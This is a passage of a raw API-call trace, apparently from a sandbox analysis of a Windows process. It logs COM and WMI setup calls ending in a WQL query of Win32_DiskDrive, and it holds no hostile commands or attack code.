returned 0x0 [0256.696] WbemDefPath:IUnknown:QueryInterface (in: This=0x6619b0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e38c | out: ppvObject=0x19e38c*=0x6619b0) returned 0x0 [0256.705] WbemDefPath:IUnknown:QueryInterface (in: This=0x6619b0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e348 | out: ppvObject=0x19e348*=0x0) returned 0x80004002 [0256.705] WbemDefPath:IUnknown:QueryInterface (in: This=0x6619b0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19df3c | out: ppvObject=0x19df3c*=0x0) returned 0x80004002 [0256.705] WbemDefPath:IUnknown:AddRef (This=0x6619b0) returned 0x3 [0256.705] WbemDefPath:IUnknown:QueryInterface (in: This=0x6619b0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19dca4 | out: ppvObject=0x19dca4*=0x0) returned 0x80004002 [0256.705] WbemDefPath:IUnknown:QueryInterface (in: This=0x6619b0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19dc54 | out: ppvObject=0x19dc54*=0x0) returned 0x80004002 [0256.705] WbemDefPath:IUnknown:QueryInterface (in: This=0x6619b0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19dc60 | out: ppvObject=0x19dc60*=0x641d28) returned 0x0 [0256.705] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x641d28, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19dc68 | out: pCid=0x19dc68*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0256.705] WbemDefPath:IUnknown:Release (This=0x641d28) returned 0x3 [0256.705] CoGetContextToken (in: pToken=0x19dcc0 | out: pToken=0x19dcc0) returned 0x0 [0256.706] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0256.706] WbemDefPath:IUnknown:QueryInterface (in: This=0x6619b0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e158 | out: ppvObject=0x19e158*=0x0) returned 0x80004002 [0256.706] WbemDefPath:IUnknown:Release (This=0x6619b0) returned 0x2 [0256.706] WbemDefPath:IUnknown:Release (This=0x6619b0) returned 0x1 [0256.706] CoGetContextToken (in: pToken=0x19ea50 | out: pToken=0x19ea50) returned 0x0 [0256.706] CoGetContextToken (in: pToken=0x19e9b0 | out: pToken=0x19e9b0) returned 0x0 [0256.706] WbemDefPath:IUnknown:QueryInterface (in: This=0x6619b0, riid=0x19ea80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19ea7c | out: ppvObject=0x19ea7c*=0x6619b0) returned 0x0 [0256.706] WbemDefPath:IUnknown:AddRef (This=0x6619b0) returned 0x3 [0256.706] WbemDefPath:IUnknown:Release (This=0x6619b0) returned 0x2 [0256.708] WbemDefPath:IWbemPath:SetText (This=0x6619b0, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0256.709] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f2fc | out: puCount=0x19f2fc*=0x2) returned 0x0 [0256.709] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f2f8*=0x0, pszText=0x0 | out: puBuffLength=0x19f2f8*=0xf, pszText=0x0) returned 0x0 [0256.710] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f2f8*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f2f8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0256.711] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f288 | out: ppv=0x19f288*=0x601a94) returned 0x0 [0256.711] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f280 | out: pAptType=0x19f280*=1) returned 0x0 [0256.711] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f284 | out: ppvObject=0x19f284*=0x0) returned 0x80004002 [0256.711] IUnknown:Release (This=0x601a94) returned 0x0 [0256.712] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x19f194 | out: lpiid=0x19f194) returned 0x0 [0256.713] CoGetClassObject (in: rclsid=0x6bdd2c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eea8 | out: ppv=0x19eea8*=0x641668) returned 0x0 [0257.184] WbemLocator:IUnknown:QueryInterface (in: This=0x641668, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19f0c0 | out: ppvObject=0x19f0c0*=0x0) returned 0x80004002 [0257.184] WbemLocator:IClassFactory:CreateInstance (in: This=0x641668, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f0d4 | out: ppvObject=0x19f0d4*=0x65c948) returned 0x0 [0257.184] WbemLocator:IUnknown:Release (This=0x641668) returned 0x0 [0257.184] WbemLocator:IUnknown:QueryInterface (in: This=0x65c948, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ecf4 | out: ppvObject=0x19ecf4*=0x65c948) returned 0x0 [0257.184] WbemLocator:IUnknown:QueryInterface (in: This=0x65c948, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ecb0 | out: ppvObject=0x19ecb0*=0x0) returned 0x80004002 [0257.184] WbemLocator:IUnknown:QueryInterface (in: This=0x65c948, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e8a4 | out: ppvObject=0x19e8a4*=0x0) returned 0x80004002 [0257.184] WbemLocator:IUnknown:AddRef (This=0x65c948) returned 0x3 [0257.184] WbemLocator:IUnknown:QueryInterface (in: This=0x65c948, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e60c | out: ppvObject=0x19e60c*=0x0) returned 0x80004002 [0257.184] WbemLocator:IUnknown:QueryInterface (in: This=0x65c948, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e5bc | out: ppvObject=0x19e5bc*=0x0) returned 0x80004002 [0257.184] WbemLocator:IUnknown:QueryInterface (in: This=0x65c948, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e5c8 | out: ppvObject=0x19e5c8*=0x0) returned 0x80004002 [0257.184] CoGetContextToken (in: pToken=0x19e628 | out: pToken=0x19e628) returned 0x0 [0257.185] CoGetObjectContext (in: riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x64184c | out: ppv=0x64184c*=0x601a88) returned 0x0 [0257.185] CoGetContextToken (in: pToken=0x19ea30 | out: pToken=0x19ea30) returned 0x0 [0257.185] WbemLocator:IUnknown:QueryInterface (in: This=0x65c948, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eac0 | out: ppvObject=0x19eac0*=0x0) returned 0x80004002 [0257.185] WbemLocator:IUnknown:Release (This=0x65c948) returned 0x2 [0257.185] WbemLocator:IUnknown:Release (This=0x65c948) returned 0x1 [0257.185] CoGetContextToken (in: pToken=0x19f0a0 | out: pToken=0x19f0a0) returned 0x0 [0257.185] CoGetContextToken (in: pToken=0x19f000 | out: pToken=0x19f000) returned 0x0 [0257.185] WbemLocator:IUnknown:QueryInterface (in: This=0x65c948, riid=0x19f0d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19f0cc | out: ppvObject=0x19f0cc*=0x65c948) returned 0x0 [0257.185] WbemLocator:IUnknown:AddRef (This=0x65c948) returned 0x3 [0257.185] WbemLocator:IUnknown:Release (This=0x65c948) returned 0x2 [0257.188] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f264 | out: puCount=0x19f264*=0x2) returned 0x0 [0257.188] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=8, puBuffLength=0x19f260*=0x0, pszText=0x0 | out: puBuffLength=0x19f260*=0xf, pszText=0x0) returned 0x0 [0257.188] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=8, puBuffLength=0x19f260*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f260*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0257.189] CoCreateInstance (in: rclsid=0x6d3c1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d3c12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x19f13c | out: ppv=0x19f13c*=0x5d6718) returned 0x0 [0257.189] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5d6718, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x19f1d0 | out: ppNamespace=0x19f1d0*=0x67e780) returned 0x0 [0260.810] WbemLocator:IUnknown:QueryInterface (in: This=0x67e780, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f06c | out: ppvObject=0x19f06c*=0x67014c) returned 0x0 [0260.810] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x67014c, pProxy=0x67e780, pAuthnSvc=0x19f0bc, pAuthzSvc=0x19f0b8, pServerPrincName=0x19f0b0, pAuthnLevel=0x19f0b4, pImpLevel=0x19f0a4, pAuthInfo=0x19f0a8, pCapabilites=0x19f0ac | out: pAuthnSvc=0x19f0bc*=0xa, pAuthzSvc=0x19f0b8*=0x0, pServerPrincName=0x19f0b0, pAuthnLevel=0x19f0b4*=0x6, pImpLevel=0x19f0a4*=0x2, pAuthInfo=0x19f0a8, pCapabilites=0x19f0ac*=0x1) returned 0x0 [0260.810] WbemLocator:IUnknown:Release (This=0x67014c) returned 0x1 [0260.810] WbemLocator:IUnknown:QueryInterface (in: This=0x67e780, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f060 | out: ppvObject=0x19f060*=0x670170) returned 0x0 [0260.810] WbemLocator:IUnknown:QueryInterface (in: This=0x67e780, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f05c | out: ppvObject=0x19f05c*=0x67014c) returned 0x0 [0260.810] WbemLocator:IClientSecurity:SetBlanket (This=0x67014c, pProxy=0x67e780, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0260.811] WbemLocator:IUnknown:Release (This=0x67014c) returned 0x2 [0260.811] WbemLocator:IUnknown:Release (This=0x670170) returned 0x1 [0260.811] CoTaskMemFree (pv=0x54bc1a8) [0260.811] WbemLocator:IUnknown:Release (This=0x5d6718) returned 0x0 [0260.811] WbemLocator:IUnknown:QueryInterface (in: This=0x67e780, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec5c | out: ppvObject=0x19ec5c*=0x670170) returned 0x0 [0260.811] WbemLocator:IUnknown:QueryInterface (in: This=0x670170, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec18 | out: ppvObject=0x19ec18*=0x0) returned 0x80004002 [0260.812] WbemLocator:IUnknown:QueryInterface (in: This=0x670170, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ea34 | out: ppvObject=0x19ea34*=0x0) returned 0x80004002 [0260.812] WbemLocator:IUnknown:QueryInterface (in: This=0x67e780, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e80c | out: ppvObject=0x19e80c*=0x0) returned 0x80004002 [0260.813] WbemLocator:IUnknown:AddRef (This=0x670170) returned 0x3 [0260.813] WbemLocator:IUnknown:QueryInterface (in: This=0x670170, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e574 | out: ppvObject=0x19e574*=0x0) returned 0x80004002 [0260.813] WbemLocator:IUnknown:QueryInterface (in: This=0x670170, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e524 | out: ppvObject=0x19e524*=0x0) returned 0x80004002 [0260.813] WbemLocator:IUnknown:QueryInterface (in: This=0x670170, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e530 | out: ppvObject=0x19e530*=0x6700cc) returned 0x0 [0260.813] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x6700cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e538 | out: pCid=0x19e538*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0260.813] WbemLocator:IUnknown:Release (This=0x6700cc) returned 0x3 [0260.813] CoGetContextToken (in: pToken=0x19e590 | out: pToken=0x19e590) returned 0x0 [0260.813] CoGetContextToken (in: pToken=0x19e998 | out: pToken=0x19e998) returned 0x0 [0260.813] WbemLocator:IUnknown:QueryInterface (in: This=0x670170, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea28 | out: ppvObject=0x19ea28*=0x670154) returned 0x0 [0260.814] WbemLocator:IRpcOptions:Query (in: This=0x670154, pPrx=0x670170, dwProperty=2, pdwValue=0x19ea50 | out: pdwValue=0x19ea50) returned 0x80004002 [0260.814] WbemLocator:IUnknown:Release (This=0x670154) returned 0x3 [0260.814] WbemLocator:IUnknown:Release (This=0x670170) returned 0x2 [0260.814] CoGetContextToken (in: pToken=0x19ef70 | out: pToken=0x19ef70) returned 0x0 [0260.814] CoGetContextToken (in: pToken=0x19eed0 | out: pToken=0x19eed0) returned 0x0 [0260.814] WbemLocator:IUnknown:QueryInterface (in: This=0x670170, riid=0x19efa0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19ef9c | out: ppvObject=0x19ef9c*=0x67e780) returned 0x0 [0260.814] WbemLocator:IUnknown:AddRef (This=0x67e780) returned 0x4 [0260.814] WbemLocator:IUnknown:Release (This=0x67e780) returned 0x3 [0260.814] WbemLocator:IUnknown:Release (This=0x67e780) returned 0x2 [0260.822] SysStringLen (param_1=0x0) returned 0x0 [0260.823] CoGetContextToken (in: pToken=0x19ef68 | out: pToken=0x19ef68) returned 0x0 [0260.823] WbemLocator:IUnknown:AddRef (This=0x670170) returned 0x3 [0260.823] WbemLocator:IUnknown:QueryInterface (in: This=0x670170, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19edfc | out: ppvObject=0x19edfc*=0x670170) returned 0x0 [0260.823] WbemLocator:IUnknown:Release (This=0x670170) returned 0x3 [0260.823] WbemLocator:IUnknown:Release (This=0x670170) returned 0x2 [0260.823] CoGetContextToken (in: pToken=0x19f060 | out: pToken=0x19f060) returned 0x0 [0260.823] WbemLocator:IUnknown:AddRef (This=0x67e780) returned 0x3 [0260.823] IWbemServices:ExecQuery (in: This=0x67e780, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_DiskDrive", lFlags=16, pCtx=0x0, ppEnum=0x19f26c | out: ppEnum=0x19f26c*=0x663528) returned 0x0 [0260.831] IUnknown:QueryInterface (in: This=0x663528, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f0d0 | out: ppvObject=0x19f0d0*=0x66352c) returned 0x0 [0260.832] IClientSecurity:QueryBlanket (in: This=0x66352c, pProxy=0x663528, pAuthnSvc=0x19f120, pAuthzSvc=0x19f11c, pServerPrincName=0x19f114, pAuthnLevel=0x19f118, pImpLevel=0x19f108, pAuthInfo=0x19f10c, pCapabilites=0x19f110 | out: pAuthnSvc=0x19f120*=0xa, pAuthzSvc=0x19f11c*=0x0, pServerPrincName=0x19f114, pAuthnLevel=0x19f118*=0x6, pImpLevel=0x19f108*=0x2, pAuthInfo=0x19f10c, pCapabilites=0x19f110*=0x1) returned 0x0 [0260.832] IUnknown:Release (This=0x66352c) returned 0x1 [0260.832] IUnknown:QueryInterface (in: This=0x663528, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f0c4 | out: ppvObject=0x19f0c4*=0x66f870) returned 0x0 [0260.832] IUnknown:QueryInterface (in: This=0x663528, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f0c0 | out: ppvObject=0x19f0c0*=0x66352c) returned 0x0 [0260.832] IClientSecurity:SetBlanket (This=0x66352c, pProxy=0x663528, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0260.836] IUnknown:Release (This=0x66352c) returned 0x2 [0260.836] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x1 [0260.836] CoTaskMemFree (pv=0x54bc358) [0260.836] IUnknown:QueryInterface (in: This=0x663528, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ecbc | out: ppvObject=0x19ecbc*=0x66f870) returned 0x0 [0260.836] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec78 | out: ppvObject=0x19ec78*=0x0) returned 0x80004002 [0260.837] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ea94 | out: ppvObject=0x19ea94*=0x0) returned 0x80004002 [0260.837] IUnknown:QueryInterface (in: This=0x663528, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e86c | out: ppvObject=0x19e86c*=0x0) returned 0x80004002 [0260.837] WbemLocator:IUnknown:AddRef (This=0x66f870) returned 0x3 [0260.837] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e5d4 | out: ppvObject=0x19e5d4*=0x0) returned 0x80004002 [0260.837] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e584 | out: ppvObject=0x19e584*=0x0) returned 0x80004002 [0260.837] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e590 | out: ppvObject=0x19e590*=0x66f7cc) returned 0x0 [0260.838] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66f7cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e598 | out: pCid=0x19e598*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0260.838] WbemLocator:IUnknown:Release (This=0x66f7cc) returned 0x3 [0260.838] CoGetContextToken (in: pToken=0x19e5f0 | out: pToken=0x19e5f0) returned 0x0 [0260.838] CoGetContextToken (in: pToken=0x19e9f8 | out: pToken=0x19e9f8) returned 0x0 [0260.838] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea88 | out: ppvObject=0x19ea88*=0x66f854) returned 0x0 [0260.838] WbemLocator:IRpcOptions:Query (in: This=0x66f854, pPrx=0x66f870, dwProperty=2, pdwValue=0x19eab0 | out: pdwValue=0x19eab0) returned 0x80004002 [0260.838] WbemLocator:IUnknown:Release (This=0x66f854) returned 0x3 [0260.838] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x2 [0260.838] CoGetContextToken (in: pToken=0x19efd0 | out: pToken=0x19efd0) returned 0x0 [0260.838] CoGetContextToken (in: pToken=0x19ef30 | out: pToken=0x19ef30) returned 0x0 [0260.838] WbemLocator:IUnknown:QueryInterface (in: This=0x66f870, riid=0x19f000*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19effc | out: ppvObject=0x19effc*=0x663528) returned 0x0 [0260.838] IUnknown:AddRef (This=0x663528) returned 0x4 [0260.838] IUnknown:Release (This=0x663528) returned 0x3 [0260.838] IUnknown:Release (This=0x663528) returned 0x2 [0260.838] WbemLocator:IUnknown:Release (This=0x67e780) returned 0x2 [0260.838] SysStringLen (param_1=0x0) returned 0x0 [0260.838] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f2b8 | out: puCount=0x19f2b8*=0x2) returned 0x0 [0260.839] 